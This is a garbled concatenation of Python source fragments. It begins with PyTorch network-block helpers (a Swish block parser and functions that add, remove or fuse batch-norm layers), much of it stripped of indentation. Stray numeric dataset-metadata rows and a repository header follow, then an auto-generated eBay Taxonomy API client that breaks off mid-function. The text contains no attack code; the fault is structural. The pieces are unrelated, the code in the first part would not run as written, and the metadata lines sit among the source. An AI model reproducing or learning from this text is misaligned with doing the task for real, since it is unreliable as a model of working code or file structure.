        return self.out_channels * input_resolution ** 2

    def get_model_size(self):
        # no learnable parameters
        return 0

    def set_in_channels(self, channels):
        self.in_channels = channels
        self.out_channels = channels

    @classmethod
    def create_from_str(cls, struct_str, no_create=False, **kwargs):
        """Parse 'Swish(<name>|<out_channels>)' and return (block, remainder)."""
        assert Swish.is_instance_from_str(struct_str)
        close_idx = _get_right_parentheses_index_(struct_str)
        assert close_idx is not None
        inner = struct_str[len('Swish('):close_idx]
        # an optional '<name>|' prefix carries the block name
        bar_pos = inner.find('|')
        if bar_pos >= 0:
            block_name = inner[0:bar_pos]
            inner = inner[bar_pos + 1:]
        else:
            block_name = f'uuid{uuid.uuid4().hex}'
        return (Swish(out_channels=int(inner), no_create=no_create, block_name=block_name),
                struct_str[close_idx + 1:])
def _add_bn_layer_(block_list):
"""add bn layer to all blocks in block_list"""
new_block_list = []
for the_block in block_list:
if isinstance(the_block, (ConvKX, ConvDW)):
out_channels = the_block.out_channels
new_bn_block = BN(out_channels=out_channels, no_create=True)
new_seq_with_bn = Sequential(block_list=[the_block, new_bn_block], no_create=True)
new_block_list.append(new_seq_with_bn)
elif hasattr(the_block, 'block_list'):
new_block_list = _add_bn_layer_(the_block.block_list)
the_block.module_list = nn.ModuleList(new_block_list)
the_block.block_list = new_block_list
new_block_list.append(the_block)
else:
new_block_list.append(the_block)
return new_block_list
def _remove_bn_layer_(block_list):
"""remove bn layer from all blocks in block_list"""
new_block_list = []
for the_block in block_list:
if isinstance(the_block, BN):
continue
if hasattr(the_block, 'block_list'):
new_block_list = _remove_bn_layer_(the_block.block_list)
the_block.module_list = nn.ModuleList(new_block_list)
the_block.block_list = new_block_list
new_block_list.append(the_block)
else:
new_block_list.append(the_block)
return new_block_list
def _add_se_layer_(block_list):
"""add se layer to all blocks in block_list"""
new_block_list = []
for the_block in block_list:
if isinstance(the_block, RELU):
out_channels = the_block.out_channels
new_se_block = SE(out_channels=out_channels, no_create=True)
new_seq_with_bn = Sequential(block_list=[the_block, new_se_block], no_create=True)
new_block_list.append(new_seq_with_bn)
elif hasattr(the_block, 'block_list'):
new_block_list = _add_se_layer_(the_block.block_list)
the_block.module_list = nn.ModuleList(new_block_list)
the_block.block_list = new_block_list
new_block_list.append(the_block)
else:
new_block_list.append(the_block)
return new_block_list
def _replace_relu_with_swish_layer_(block_list):
"""replace all relu with swish in all blocks"""
new_block_list = []
for the_block in block_list:
if isinstance(the_block, RELU):
out_channels = the_block.out_channels
new_swish_block = Swish(out_channels=out_channels, no_create=True)
new_block_list.append(new_swish_block)
elif hasattr(the_block, 'block_list'):
new_block_list = _replace_relu_with_swish_layer_(the_block.block_list)
the_block.module_list = nn.ModuleList(new_block_list)
the_block.block_list = new_block_list
new_block_list.append(the_block)
else:
new_block_list.append(the_block)
return new_block_list
def _fuse_convkx_and_bn_(convkx, batch_norm):
"""fuse conv and bn layer"""
the_weight_scale = batch_norm.weight / torch.sqrt(batch_norm.running_var + batch_norm.eps)
convkx.weight[:] = convkx.weight * the_weight_scale.view((-1, 1, 1, 1))
the_bias_shift = (batch_norm.weight * batch_norm.running_mean) / \
torch.sqrt(batch_norm.running_var + batch_norm.eps)
batch_norm.weight[:] = 1
batch_norm.bias[:] = batch_norm.bias - the_bias_shift
batch_norm.running_var[:] = 1.0 - batch_norm.eps
batch_norm.running_mean[:] = 0.0
def _fuse_bn_layer_for_blocks_list_(block_list):
"""apply fuse operation to all blocks"""
last_block = None # type: ConvKX
with torch.no_grad():
for the_block in block_list:
if isinstance(the_block, BN):
# assert isinstance(last_block, ConvKX) or isinstance(last_block, ConvDW)
if isinstance(last_block, (ConvKX, ConvDW)):
_fuse_convkx_and_bn_(last_block.netblock, the_block.netblock)
else:
print(f'--- warning! Cannot fuse BN={the_block} because last_block={last_block}')
last_block = None
elif isinstance(the_block, (ConvKX, ConvDW)):
last_block = the_block
elif hasattr(the_block, 'block_list') and the_block.block_list is not None and \
len(the_block.block_list) > 0:
_fuse_bn_layer_for_blocks_list_(the_block.block_list)
else:
pass
def register_netblocks_dict(netblocks_dict: dict):
    """Register every basic layer class defined in this file into the dict.

    Keys are the class names; the dict is updated in place and returned.
    """
    local_classes = [
        AdaptiveAvgPool, BN, ConvDW, ConvKX,
        ConvKXG2, ConvKXG4, ConvKXG8, ConvKXG16, ConvKXG32,
        Flatten, Linear, MaxPool,
        MultiSumBlock, MultiCatBlock,
        PlainNetBasicBlockClass,
        RELU, ResBlock, ResBlockProj,
        Sequential, SE, Swish,
    ]
    netblocks_dict.update({c.__name__: c for c in local_classes})
    return netblocks_dict
| 37.20013
| 119
| 0.63503
| 7,450
| 57,065
| 4.498121
| 0.033691
| 0.074185
| 0.052371
| 0.045299
| 0.877622
| 0.851332
| 0.835785
| 0.819791
| 0.805109
| 0.78983
| 0
| 0.009412
| 0.270131
| 57,065
| 1,533
| 120
| 37.224397
| 0.795174
| 0.031858
| 0
| 0.762799
| 0
| 0
| 0.040367
| 0.029675
| 0
| 0
| 0
| 0
| 0.044369
| 1
| 0.135666
| false
| 0.00256
| 0.008532
| 0.053754
| 0.274744
| 0.001706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da8f063f9f138fe03610d7600654dcdc0b4fabc2
| 59,783
|
py
|
Python
|
src/ebay_rest/api/commerce_taxonomy/api/category_tree_api.py
|
gbm001/ebay_rest
|
077d3478423ccd80ff35e0361821d6a11180bc54
|
[
"MIT"
] | 3
|
2021-12-12T04:28:03.000Z
|
2022-03-10T03:29:18.000Z
|
src/ebay_rest/api/commerce_taxonomy/api/category_tree_api.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 33
|
2021-06-16T20:44:36.000Z
|
2022-03-30T14:55:06.000Z
|
src/ebay_rest/api/commerce_taxonomy/api/category_tree_api.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 7
|
2021-06-03T09:30:23.000Z
|
2022-03-08T19:51:33.000Z
|
# coding: utf-8
"""
Taxonomy API
Use the Taxonomy API to discover the most appropriate eBay categories under which sellers can offer inventory items for sale, and the most likely categories under which buyers can browse or search for items to purchase. In addition, the Taxonomy API provides metadata about the required and recommended category aspects to include in listings, and also has two operations to retrieve parts compatibility information. # noqa: E501
OpenAPI spec version: v1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...commerce_taxonomy.api_client import ApiClient
class CategoryTreeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    # fall back to a freshly constructed default client when none is given
    self.api_client = ApiClient() if api_client is None else api_client
def fetch_item_aspects(self, category_tree_id, **kwargs):  # noqa: E501
    """Get Aspects for All Leaf Categories in a Marketplace.  # noqa: E501

    Returns the complete list of aspects for all leaf categories of the
    eBay marketplace identified by category_tree_id; the response is a
    gzipped JSON file. Synchronous by default; pass async_req=True to get
    the request thread instead.

    :param async_req bool
    :param str category_tree_id: The unique identifier of the eBay category tree being requested. (required)
    :return: GetCategoriesAspectResponse, or the request thread when
        called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # _with_http_info returns the data directly in the synchronous case
    # and the request thread when async_req=True; either way it is our
    # return value, so no branching is needed here.
    return self.fetch_item_aspects_with_http_info(category_tree_id, **kwargs)  # noqa: E501
def fetch_item_aspects_with_http_info(self, category_tree_id, **kwargs):  # noqa: E501
    """Get Aspects for All Leaf Categories in a Marketplace.  # noqa: E501

    Builds and dispatches the HTTP request for fetch_item_aspects.
    Synchronous by default; pass async_req=True to get the request thread.

    :param async_req bool
    :param str category_tree_id: The unique identifier of the eBay category tree being requested. (required)
    :return: GetCategoriesAspectResponse, or the request thread when
        called asynchronously.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when category_tree_id is None.
    """
    all_params = ['category_tree_id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    # collect the positional parameter plus validated keyword arguments
    params = {'category_tree_id': category_tree_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method fetch_item_aspects" % key
            )
        params[key] = val
    # verify the required parameter 'category_tree_id' is set
    if params.get('category_tree_id') is None:
        raise ValueError("Missing the required parameter `category_tree_id` when calling `fetch_item_aspects`")  # noqa: E501

    collection_formats = {}
    path_params = {'category_tree_id': params['category_tree_id']}  # noqa: E501
    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501

    return self.api_client.call_api(
        '/category_tree/{category_tree_id}/fetch_item_aspects', 'GET',
        path_params,
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='GetCategoriesAspectResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_category_subtree(self, category_id, category_tree_id, **kwargs):  # noqa: E501
    """Get a Category Subtree.  # noqa: E501

    Retrieves all nodes of the category tree below the category identified
    by category_id within the tree identified by category_tree_id.
    Synchronous by default; pass async_req=True to get the request thread.

    :param async_req bool
    :param str category_id: The unique identifier of the category at the top of the subtree being requested. (required)
    :param str category_tree_id: The unique identifier of the eBay category tree from which a category subtree is being requested. (required)
    :return: CategorySubtree, or the request thread when called
        asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # _with_http_info returns the data directly in the synchronous case
    # and the request thread when async_req=True; either way it is our
    # return value, so no branching is needed here.
    return self.get_category_subtree_with_http_info(category_id, category_tree_id, **kwargs)  # noqa: E501
def get_category_subtree_with_http_info(self, category_id, category_tree_id, **kwargs):  # noqa: E501
    """Get a Category Subtree.  # noqa: E501

    Builds and dispatches the HTTP request for get_category_subtree.
    Synchronous by default; pass async_req=True to get the request thread.

    :param async_req bool
    :param str category_id: The unique identifier of the category at the top of the subtree being requested. (required)
    :param str category_tree_id: The unique identifier of the eBay category tree from which a category subtree is being requested. (required)
    :return: CategorySubtree, or the request thread when called
        asynchronously.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when a required parameter is None.
    """
    all_params = ['category_id', 'category_tree_id', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']  # noqa: E501
    # collect the positional parameters plus validated keyword arguments
    params = {'category_id': category_id, 'category_tree_id': category_tree_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_category_subtree" % key
            )
        params[key] = val
    # verify the required parameter 'category_id' is set
    if params.get('category_id') is None:
        raise ValueError("Missing the required parameter `category_id` when calling `get_category_subtree`")  # noqa: E501
    # verify the required parameter 'category_tree_id' is set
    if params.get('category_tree_id') is None:
        raise ValueError("Missing the required parameter `category_tree_id` when calling `get_category_subtree`")  # noqa: E501

    collection_formats = {}
    path_params = {'category_tree_id': params['category_tree_id']}  # noqa: E501
    query_params = [('category_id', params['category_id'])]  # noqa: E501
    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['api_auth']  # noqa: E501

    return self.api_client.call_api(
        '/category_tree/{category_tree_id}/get_category_subtree', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='CategorySubtree',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_category_suggestions(self, category_tree_id, q, **kwargs):  # noqa: E501
    """Get Suggested Categories  # noqa: E501

    Retrieve the category tree leaf nodes that eBay considers the closest
    match for the query string ``q``, localized per the Accept-Language
    request header and including each suggestion's ancestor nodes up to the
    tree root.  The payload can be large, so requesting gzip compression
    via ``Accept-Encoding: application/gzip`` is advised.  Note: this call
    is not supported in the Sandbox environment, where ``categoryName``
    values are boilerplate.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_category_suggestions(category_tree_id, q, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_tree_id: The unique identifier of the eBay category tree for which suggested nodes are being requested. (required)
    :param str q: A free-form string that describes or characterizes the item being offered for sale; eBay parses it and returns suggested categories. (required)
    :return: CategorySuggestionResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # The *_with_http_info helper handles both the synchronous and the
    # async_req paths, so simply forward to it with HTTP metadata stripped.
    kwargs['_return_http_data_only'] = True
    return self.get_category_suggestions_with_http_info(category_tree_id, q, **kwargs)  # noqa: E501
def get_category_suggestions_with_http_info(self, category_tree_id, q, **kwargs):  # noqa: E501
    """Get Suggested Categories  # noqa: E501

    Low-level companion of ``get_category_suggestions``: validates the
    arguments and performs ``GET
    /category_tree/{category_tree_id}/get_category_suggestions`` through
    the shared API client.  Returns leaf nodes that eBay considers the
    closest match for ``q``, localized per Accept-Language, each with its
    ancestor chain.  Not supported in the Sandbox environment.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_category_suggestions_with_http_info(category_tree_id, q, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_tree_id: The unique identifier of the eBay category tree for which suggested nodes are being requested. (required)
    :param str q: A free-form string that describes or characterizes the item being offered for sale. (required)
    :return: CategorySuggestionResponse
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if a required parameter is missing or None.
    """
    # Build the effective parameter dict explicitly instead of mutating the
    # snapshot returned by locals(), and iterate kwargs with dict.items()
    # rather than the legacy six.iteritems py2 shim.
    all_params = {
        'category_tree_id', 'q',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    }
    params = {'category_tree_id': category_tree_id, 'q': q}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_category_suggestions" % key
            )
        params[key] = val
    # verify the required parameters are set
    if params.get('category_tree_id') is None:
        raise ValueError("Missing the required parameter `category_tree_id` when calling `get_category_suggestions`")  # noqa: E501
    if params.get('q') is None:
        raise ValueError("Missing the required parameter `q` when calling `get_category_suggestions`")  # noqa: E501

    path_params = {'category_tree_id': params['category_tree_id']}  # noqa: E501
    query_params = [('q', params['q'])]  # noqa: E501
    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/category_tree/{category_tree_id}/get_category_suggestions', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='CategorySuggestionResponse',  # noqa: E501
        auth_settings=['api_auth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_category_tree(self, category_tree_id, **kwargs):  # noqa: E501
    """Get a Category Tree  # noqa: E501

    Retrieve the complete category tree identified by ``category_tree_id``
    (as returned by getDefaultCategoryTreeId in the ``categoryTreeId``
    field), including every node and the marketplaces that use the tree.
    The payload can be very large, so requesting gzip compression via
    ``Accept-Encoding: application/gzip`` is strongly advised.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_category_tree(category_tree_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_tree_id: The unique identifier of the eBay category tree being requested. (required)
    :return: CategoryTree
        If the method is called asynchronously,
        returns the request thread.
    """
    # The *_with_http_info helper handles both the synchronous and the
    # async_req paths, so simply forward to it with HTTP metadata stripped.
    kwargs['_return_http_data_only'] = True
    return self.get_category_tree_with_http_info(category_tree_id, **kwargs)  # noqa: E501
def get_category_tree_with_http_info(self, category_tree_id, **kwargs):  # noqa: E501
    """Get a Category Tree  # noqa: E501

    Low-level companion of ``get_category_tree``: validates the argument
    and performs ``GET /category_tree/{category_tree_id}`` through the
    shared API client, returning all nodes of the specified tree plus the
    marketplaces that use it.  The payload can be very large, so gzip
    compression via ``Accept-Encoding`` is strongly advised.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_category_tree_with_http_info(category_tree_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_tree_id: The unique identifier of the eBay category tree being requested. (required)
    :return: CategoryTree
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if `category_tree_id` is missing or None.
    """
    # Build the effective parameter dict explicitly instead of mutating the
    # snapshot returned by locals(), and iterate kwargs with dict.items()
    # rather than the legacy six.iteritems py2 shim.
    all_params = {
        'category_tree_id',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    }
    params = {'category_tree_id': category_tree_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_category_tree" % key
            )
        params[key] = val
    # verify the required parameter 'category_tree_id' is set
    if params.get('category_tree_id') is None:
        raise ValueError("Missing the required parameter `category_tree_id` when calling `get_category_tree`")  # noqa: E501

    path_params = {'category_tree_id': params['category_tree_id']}  # noqa: E501
    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/category_tree/{category_tree_id}', 'GET',
        path_params,
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='CategoryTree',  # noqa: E501
        auth_settings=['api_auth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_compatibility_properties(self, category_tree_id, category_id, **kwargs):  # noqa: E501
    """Get Compatibility Properties  # noqa: E501

    Retrieve the compatible-vehicle aspects (e.g. 'Make', 'Model', 'Year',
    'Engine', 'Trim') used to define a motor vehicle that is compatible
    with a part or accessory, localized for the eBay marketplace.  The
    specified category must support parts compatibility; only cars,
    trucks, and motorcycle parts/accessories listings are supported, and
    only on the marketplaces that support parts compatibility.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_compatibility_properties(category_tree_id, category_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_tree_id: The unique identifier of the category tree, passed as a path parameter (eBay US: 0, eBay Motors US: 100, eBay Canada: 2, eBay UK: 3, eBay Germany: 77, eBay Australia: 15, eBay France: 71, eBay Italy: 101, eBay Spain: 186). (required)
    :param str category_id: The unique identifier of an eBay category that supports parts compatibility for cars, trucks, or motorcycles, passed as a query parameter. (required)
    :return: GetCompatibilityMetadataResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # The *_with_http_info helper handles both the synchronous and the
    # async_req paths, so simply forward to it with HTTP metadata stripped.
    kwargs['_return_http_data_only'] = True
    return self.get_compatibility_properties_with_http_info(category_tree_id, category_id, **kwargs)  # noqa: E501
def get_compatibility_properties_with_http_info(self, category_tree_id, category_id, **kwargs):  # noqa: E501
    """Get Compatibility Properties  # noqa: E501

    Low-level companion of ``get_compatibility_properties``: validates the
    arguments and performs ``GET
    /category_tree/{category_tree_id}/get_compatibility_properties``
    through the shared API client.  The category identified by
    ``category_id`` must support parts compatibility for cars, trucks, or
    motorcycles on the marketplace identified by ``category_tree_id``.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_compatibility_properties_with_http_info(category_tree_id, category_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_tree_id: The unique identifier of the category tree, passed as a path parameter (eBay US: 0, eBay Motors US: 100, eBay Canada: 2, eBay UK: 3, eBay Germany: 77, eBay Australia: 15, eBay France: 71, eBay Italy: 101, eBay Spain: 186). (required)
    :param str category_id: The unique identifier of an eBay category that supports parts compatibility, passed as a query parameter. (required)
    :return: GetCompatibilityMetadataResponse
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if a required parameter is missing or None.
    """
    # Build the effective parameter dict explicitly instead of mutating the
    # snapshot returned by locals(), and iterate kwargs with dict.items()
    # rather than the legacy six.iteritems py2 shim.
    all_params = {
        'category_tree_id', 'category_id',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    }
    params = {'category_tree_id': category_tree_id,
              'category_id': category_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_compatibility_properties" % key
            )
        params[key] = val
    # verify the required parameters are set
    if params.get('category_tree_id') is None:
        raise ValueError("Missing the required parameter `category_tree_id` when calling `get_compatibility_properties`")  # noqa: E501
    if params.get('category_id') is None:
        raise ValueError("Missing the required parameter `category_id` when calling `get_compatibility_properties`")  # noqa: E501

    path_params = {'category_tree_id': params['category_tree_id']}  # noqa: E501
    query_params = [('category_id', params['category_id'])]  # noqa: E501
    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/category_tree/{category_tree_id}/get_compatibility_properties', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='GetCompatibilityMetadataResponse',  # noqa: E501
        auth_settings=['api_auth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_compatibility_property_values(self, category_tree_id, compatibility_property, category_id, **kwargs):  # noqa: E501
    """Get Compatibility Property Values  # noqa: E501

    Retrieve the applicable values of one compatible-vehicle property
    (named via the required ``compatibility_property`` query parameter)
    for the given marketplace and category, optionally narrowed by
    name/value pairs supplied through the ``filter`` query parameter
    (e.g. ``filter=Year:2018,Make:Toyota,Model:Camry``).

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_compatibility_property_values(category_tree_id, compatibility_property, category_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_tree_id: The unique identifier of the category tree, passed as a path parameter (eBay US: 0, eBay Motors US: 100, eBay Canada: 2, eBay UK: 3, eBay Germany: 77, eBay Australia: 15, eBay France: 71, eBay Italy: 101, eBay Spain: 186). (required)
    :param str compatibility_property: One compatible vehicle property applicable to the specified marketplace and category, as returned in the compatibilityProperties.name field of a getCompatibilityProperties response. (required)
    :param str category_id: The unique identifier of an eBay category that supports parts compatibility for cars, trucks, or motorcycles. (required)
    :param str filter: Optional comma-delimited list of colon-delimited compatible vehicle property name/value pairs used to restrict the returned values.
    :return: GetCompatibilityPropertyValuesResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # The *_with_http_info helper handles both the synchronous and the
    # async_req paths, so simply forward to it with HTTP metadata stripped.
    kwargs['_return_http_data_only'] = True
    return self.get_compatibility_property_values_with_http_info(category_tree_id, compatibility_property, category_id, **kwargs)  # noqa: E501
def get_compatibility_property_values_with_http_info(self, category_tree_id, compatibility_property, category_id, **kwargs):  # noqa: E501
    """Get Compatibility Property Values  # noqa: E501

    Low-level companion of ``get_compatibility_property_values``:
    validates the arguments and performs ``GET
    /category_tree/{category_tree_id}/get_compatibility_property_values``
    through the shared API client.  The optional ``filter`` keyword
    restricts the returned values by compatible vehicle property
    name/value pairs (e.g. ``Year:2018,Make:Toyota,Model:Camry``).

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_compatibility_property_values_with_http_info(category_tree_id, compatibility_property, category_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str category_tree_id: The unique identifier of the category tree, passed as a path parameter (eBay US: 0, eBay Motors US: 100, eBay Canada: 2, eBay UK: 3, eBay Germany: 77, eBay Australia: 15, eBay France: 71, eBay Italy: 101, eBay Spain: 186). (required)
    :param str compatibility_property: One compatible vehicle property applicable to the specified marketplace and category. (required)
    :param str category_id: The unique identifier of an eBay category that supports parts compatibility. (required)
    :param str filter: Optional comma-delimited list of colon-delimited compatible vehicle property name/value pairs.
    :return: GetCompatibilityPropertyValuesResponse
        If the method is called asynchronously,
        returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied.
    :raises ValueError: if a required parameter is missing or None.
    """
    # Build the effective parameter dict explicitly instead of mutating the
    # snapshot returned by locals(), and iterate kwargs with dict.items()
    # rather than the legacy six.iteritems py2 shim.
    all_params = {
        'category_tree_id', 'compatibility_property', 'category_id', 'filter',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    }
    params = {'category_tree_id': category_tree_id,
              'compatibility_property': compatibility_property,
              'category_id': category_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_compatibility_property_values" % key
            )
        params[key] = val
    # verify the required parameters are set
    if params.get('category_tree_id') is None:
        raise ValueError("Missing the required parameter `category_tree_id` when calling `get_compatibility_property_values`")  # noqa: E501
    if params.get('compatibility_property') is None:
        raise ValueError("Missing the required parameter `compatibility_property` when calling `get_compatibility_property_values`")  # noqa: E501
    if params.get('category_id') is None:
        raise ValueError("Missing the required parameter `category_id` when calling `get_compatibility_property_values`")  # noqa: E501

    path_params = {'category_tree_id': params['category_tree_id']}  # noqa: E501
    query_params = [
        ('compatibility_property', params['compatibility_property']),  # noqa: E501
        ('category_id', params['category_id']),  # noqa: E501
    ]
    # 'filter' is optional; include it only when the caller supplied it.
    if 'filter' in params:
        query_params.append(('filter', params['filter']))  # noqa: E501
    # HTTP header `Accept`
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    return self.api_client.call_api(
        '/category_tree/{category_tree_id}/get_compatibility_property_values', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='GetCompatibilityPropertyValuesResponse',  # noqa: E501
        auth_settings=['api_auth'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_default_category_tree_id(self, marketplace_id, **kwargs):  # noqa: E501
    """Get a Default Category Tree ID  # noqa: E501

    A marketplace might use multiple category trees, but one of them is the
    default.  This call retrieves a reference to that default tree for the
    specified eBay marketplace ID; the response carries only the tree's
    unique identifier and version, which can then be used to fetch the
    tree itself.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_default_category_tree_id(marketplace_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str marketplace_id: The ID of the eBay marketplace for which the category tree ID is being requested. For a list of supported marketplace IDs, see Marketplaces with Default Category Trees. (required)
    :param str accept_language: A header indicating the natural language the seller prefers for the response (e.g. Accept-Language: fr-CA for EBAY_CA in French, fr-BE for EBAY_BE in French).
    :return: BaseCategoryTree
        If the method is called asynchronously,
        returns the request thread.
    """
    # The *_with_http_info helper handles both the synchronous and the
    # async_req paths, so simply forward to it with HTTP metadata stripped.
    kwargs['_return_http_data_only'] = True
    return self.get_default_category_tree_id_with_http_info(marketplace_id, **kwargs)  # noqa: E501
def get_default_category_tree_id_with_http_info(self, marketplace_id, **kwargs):  # noqa: E501
    """Get a Default Category Tree ID (raw HTTP variant).  # noqa: E501

    Same call as ``get_default_category_tree_id`` but exposes the full
    HTTP plumbing options (``_return_http_data_only``, ``_preload_content``,
    ``_request_timeout``).

    This method is synchronous by default; pass ``async_req=True`` for
    an asynchronous request.
    >>> thread = api.get_default_category_tree_id_with_http_info(marketplace_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str marketplace_id: The ID of the eBay marketplace for which the category tree ID is being requested. (required)
    :param str accept_language: Header indicating the natural language the seller prefers for the response.
    :return: BaseCategoryTree
        If the method is called asynchronously,
        returns the request thread.
    """
    # Reject any keyword argument this endpoint does not understand.
    accepted = ('marketplace_id', 'accept_language', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    for name in kwargs:
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_default_category_tree_id" % name
            )
    # Merge the positional parameter with the validated kwargs.
    params = dict(kwargs)
    params['marketplace_id'] = marketplace_id
    # verify the required parameter 'marketplace_id' is set
    if params['marketplace_id'] is None:
        raise ValueError("Missing the required parameter `marketplace_id` when calling `get_default_category_tree_id`")  # noqa: E501

    collection_formats = {}
    path_params = {}
    # marketplace_id travels as a query parameter on this endpoint.
    query_params = [('marketplace_id', params['marketplace_id'])]  # noqa: E501

    header_params = {}
    if 'accept_language' in params:
        header_params['Accept-Language'] = params['accept_language']  # noqa: E501
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
